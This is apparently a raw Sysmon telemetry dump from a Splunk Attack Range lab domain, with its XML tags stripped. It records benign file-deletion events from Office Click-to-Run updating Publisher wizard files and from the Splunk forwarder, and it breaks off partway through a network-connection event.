23542300x800000000000000069688Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\PS9CRNRH.POCMD5=363A6941CED60CEB6ED769203EE617CB,SHA256=64102C06BB8416C4E8D2346AE7C07FA5C2A0C9BC0803A1F1252E355B78A44E69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069687Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\PS2SWOOS.POCMD5=EDC1F865C36576DC1032BFEAD6C9D491,SHA256=CB88583FFF3B1483832E883B685C59B3712277D16E8DF1FDD60535DF8D9D4B9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069686Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\PS10TARG.POCMD5=2FFF32AF4198830B30DC9C98577655DE,SHA256=3A2DE9362ACE12A5894057F07DFE474EE2A695D3BD1C52F47437AE44E795F764,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069685Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\PROGRAM.XMLMD5=4FB2EE2EADE3267C6DA39276A93003A9,SHA256=23B4C2DBABC8351418F9E33CA99858ADF6467E8EB48695EC8A350147FEBFBB1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069684Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\PROGRAM.DPVMD5=FF59B1EDFE2EE9BD0393F5A2C6FC6E4F,SHA256=52501D219C9FEEAECDF4E82544554BF602BDF1F739742CDD323303E00D05E29C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069683Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\PROG98.POCMD5=772FA88A9A34610E582F8BA1D7CE2606,SHA256=F72A70E6754DFF24959135DD0ADFBBC46B6D5C92C71449D1F6AF07DA43DE9AFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069682Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\POSTCD98.POCMD5=649C1FDB89585479702896C688405700,SHA256=92EF38C30D9C195FCC090A881F61B7960B4C43555E6BC6788A6B47667A948CB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069681Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\POSTCD11.POCMD5=F2AFC822219996EBC9A80106ECAC68ED,SHA256=287CAA2F92986AB35CA46F4AE83EA15405C0EC7F87C93E3460D762D93A0F0551,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069680Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\POSTCARD.XMLMD5=0453415EAC3277B00FAB8DBD3513E910,SHA256=9184188DEEDD976E77988661508F78F13B8109747D722673E9675C811068F76E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069679Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\POSTCARD.DPVMD5=761E933087DAAA0F097634814C7A16F2,SHA256=FC5140B58E80D3174199CB03A0DB5F07975C4CF8200E8E66B6F06EBDF18CF098,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069678Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\POST98SP.POCMD5=7BEBA65F0EA0E3637C4D2AD53C422A0F,SHA256=7E78573D8BA27826BB21F9A3751FE0631C79FCAD80A29CD4690F213A14179D9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069677Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\PNCTUATE.POCMD5=F2878166441D998C8D1D4547AEE1B316,SHA256=EC2C7265356C0205F54FA8C4B7D4EFE38D4BD648256DF874FC080C6FE0E1E737,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069676Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\PICTPH.POCMD5=0B020030F63E93869568392C9EC26EE7,SHA256=8F517F48376FA55A9D1ABD454A65A19557E90DADE80365C1333D210466541409,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069675Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\PICSTYLES.DPVMD5=99A805CD94207914B5648E731F46206D,SHA256=06B9050ED462F91A4998AB8FCC1C2A9AF9FEA5DCB2BA80191109FCF8D25D5FED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069674Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\PICCAP98.POCMD5=D2D813797F000E642CAE93A663AECF02,SHA256=BC6DB4C24625BBA2F2690AA3FF2C13523E710609830DE48EBA21DA977B34AFDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069673Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\ORIG98.POCMD5=442A50059B81A58E2610D128DAC62A44,SHA256=DED4175E02E947F6BDB0F7BD22D25CA6D9355E38033EC573578B74C301FFAD73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069672Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\NEWSHM.POCMD5=1FBEEA24A6BE7A73EC76F75D9E5CB55B,SHA256=3206F6B9B74500388A33B20ABC6E70A73B56AD8E49B6AA6A836A6F0AA2048A5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069671Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\NEWS98.POCMD5=D1BA7BE463368F72F42A8C5709247B56,SHA256=D4CE64E9FA617145A2CAB5ECB734F58808F8B46BD366B1B86B4202369E0C1089,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069670Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\NEWS11.POCMD5=D8E394EFC6219542556343A46AA08FB1,SHA256=C8ACB43303C125825335F2888A1BECA81698D374E4A0D6A4E747940307317C0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069669Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\NEWS.XMLMD5=4B03C05FC519E481D43B1511A4C3E315,SHA256=4BCACF527951128AB21BD10C68D5BF16612400E53BE4BCD7C22BB230EC133607,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069668Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\NEWS.DPVMD5=6F2CBBCCB2F0515EB4620FFB48B5F323,SHA256=5D5430655F264322096DCF216B01EE37ABD7E20510598A025CEF84CE45B0EA0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069667Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\NAVBRPH2.POCMD5=34AA410AE50F7603B9832E58CB66D9AE,SHA256=790D6F487A1CF6F3948FEF0F6B662AEB0C932CE347BF9D04862F91AAE7B555EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069666Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\NAVBRPH1.POCMD5=B4418370A712233BDDAB565BE60A623D,SHA256=DD0D0DB554828FFD9D6950BF0C4BEDF45E153958A385DCC0E51F4628618C0896,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069665Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\NAVBARV.POCMD5=7E6FE47C7D48C74561275410FA4EE008,SHA256=C5C46515B9B74D4DD0E84F86123590753A4CB205F63134E0F5DED877F1469E61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069664Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\NAVBAR11.POCMD5=B89151077CBD18B0C600757882EBBC6E,SHA256=9D8D99FF8396B3986B0DD78FD94396C6722A7B70ADD226B51B2AB1FDA74B1A82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069663Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\MSTHED98.POCMD5=04FEB08D35DAFC106B33AD10FF805994,SHA256=55315B30A14567A1BC6D4135CBFEA88ADA8A5AEDD3160899321A8FB047B56150,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069662Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\MENU98.POCMD5=FE7152CC7ADBCB18232B900C2AA27A0F,SHA256=476127B1A8707B7E01A0C489476E0B78C83D6138D7F5CB99DDE420D7D1AF0ED2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069661Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\MENU.XMLMD5=D1BCF166C5D07413F0122A4A6DC1AF9C,SHA256=8E9EC0FD4A6C18F1FABD06687B0108631F2F89FF89BA5DB8DC1D98F22DA84B5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069660Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\MENU.DPVMD5=FF55D8FB02777F355B3F8CBED091FA84,SHA256=C03C9B0B962B3CBA39AFFCB4237C15BAC6C3949F144A72DF0C99D987C1BB06CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069659Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\MARQUEE.POCMD5=94168C3BE9ED57854CCFEBD06C1535F3,SHA256=EE4A2082A1DF3B2922EAB4C4643454F2713E8E24C9B4429E8EE2E047D8B4705D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069658Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\MAIN.XMLMD5=3757F59205E2F91F3371FE99F425FEB6,SHA256=7D17ECB386DC81C74518C342CA17382E371A32280F500FFB61D00331A8E4D2A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069657Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\LTHDHM.POCMD5=F44FBA4A84A3FFC7219177008A9CF473,SHA256=F1A9191951E44AD5EE3531AF64F60D3B690BCA5223AEE0355E0B4B996C9C3BCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069656Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\LTHD98SP.POCMD5=CEF0F8D0ECE0148C66BF2398845111BB,SHA256=4D6D8530E47DA9EB78AF459F4FF9CB814AC157CCD9AC943E6391BA962D1810D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069655Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\LTHD98.POCMD5=66775072AA8BBE8BD9161D4386FC7B03,SHA256=1315CDEBA500F739F1B1FCB7F1AFDCCA8A08A311A0C029F88FED13B2323F568E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069654Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\LTHD11.POCMD5=32AB366BDB4BC87C23BEC9717BB746AD,SHA256=21E0ECAB1943F1BA345BB6004925CFA440D4F97541AF0F63872F871D3D3389E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069653Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\LOGO98.POCMD5=6F452E14FAAF222751B75575C8164EE6,SHA256=859FE34F324D003923493DA47B15E3A40F3323F7352A635FB5F8293B944862FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069652Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\LINEACT.POCMD5=6B644ABA16E96FDB7ABAE1A19F157D1A,SHA256=1F63303E29BA5D64F580099CC02129FA65C2CA011D61E29CEA1F8B3E27D63366,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069651Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\LETTHEAD.XMLMD5=010CD7E94A509AF0DC40F6129D519208,SHA256=29398A46F6BBB77729D688CC9F0258DF5EA82253E1A8BD9AACADF5D639588941,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069650Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\LETTHEAD.DPVMD5=FE75BA716A410D140A1CCF9EC151CBFE,SHA256=346C6FCC4AE1C69DC7D5E1C3F3E24FDC16DBCDA9F42B2E46D97B2C9AD36A0CB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069649Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\LABELHM.POCMD5=E73AFB7ACE45E3FB8421C6B99115CC37,SHA256=6C1B826DD58653267F662E2A1C70ED132B9124FBF1147D4FA45A9C9D0D7DA65B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069648Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\LABEL98.POCMD5=ED7E11AFEFB1B76186B17B107E4FAB26,SHA256=5A2ED2B0BABB49C72E34C05416AE37E6411C00A86E04C6B08C42D93918537DD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069647Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\LABEL.XMLMD5=AA098F17F82B5B4F1BFB6B38CC4769C0,SHA256=F0B3B5FCD343F0BAB5B73710DCFFE9FCF90FD774543D9EB246BC1DF925CAF559,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069646Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\LABEL.DPVMD5=5751016DB457DB8D71E435C78DB1A362,SHA256=758F62A5F17B7ABE5006EA6601A7BF94544216F3DA33F546109B77F3BF60E66D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049761Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:25.960{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C54193F395631466D05AA8D5057B773B,SHA256=D46DCB91551B3E60CC595EB2A59083654E82B672D5A1BB30DF0A10AB955E7DD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049760Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:25.898{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D246E5FD1B7EE129203FD252A97287EA,SHA256=02E5B5B14FEAC08C225293C298C89E270E4835CB7F9513D1E4F5DD40FBE82003,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049759Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:23.298{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program 